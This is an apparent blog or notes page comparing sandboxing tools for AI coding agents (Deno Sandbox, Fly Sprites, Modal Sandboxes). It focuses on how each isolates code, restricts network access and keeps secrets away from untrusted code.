Coding Sandboxes

· Updated 2026-02-09
ai-programming

Sandboxed environments are all the rage for running untrusted code generated by coding agents. This matters when you are giving agents access to tools, APIs, and secrets and clearly do not want them being able to exfiltrate credentials or escape isolation.

Note that as of writing, there is still no solution that prevents the the Lethal Trifecta. Sandboxes and even their solutions to hide/mask your API keys and whitelist egress urls are good first steps, but there is still no mitigating prompt injection from those sites that get the agent to perform malicious actions with the access they do have.

So below is a quick (and incomplete) summary of some sandboxing tools.

Deno Sandbox

See Simon's post on it

In Deno Sandbox, secrets never enter the environment. Code sees only a placeholder

This is huge. Secrets are handled via an explicit permission model — code never sees the real value, only a proxy. This was my biggest fear about other sandbox tools.

You can use Python too. You don't even need to be using Deno or JS.

Source: https://deno.com/blog/introducing-deno-sandbox#secrets-that-cant-be-stolen

Fly Sprites

Lightweight stateful Linux VMs built on Firecracker. Designed specifically for AI coding agents and untrusted code execution.

  • Start in 1-12s, can checkpoint/restore to roll back to clean state
  • Firecracker VM isolation — even exploited code can't escape to host
  • Isolated L3 networks, no direct inbound connections

Fly has Tokenizer for secret management — an HTTP proxy that injects encrypted credentials into API calls without exposing them to the sandbox. Secrets are encrypted client-side using Tokenizer's public key, then decrypted and injected upstream. The sandbox never sees the raw secret. Similar philosophy to Deno's approach but at the network layer.

Source: https://fly.io/blog/code-and-let-live/

Modal Sandboxes

Isolated containers for running untrusted code. Built on gVisor (Google's user-space kernel).

  • Sub-second cold starts, autoscale to 50k+ sandboxes
  • Secure-by-default: no inbound connections, no Modal resource access without explicit grants
  • Network controls: block_network=True or fine-grained CIDR allowlists
  • single_use_containers=True prevents info leakage between executions

No Deno/Tokenizer-style proxy - secrets are injected as standard environment variables via os.environ. Once the code is in the container, it can read the secrets directly.

Source: https://modal.com/docs/guide/sandboxes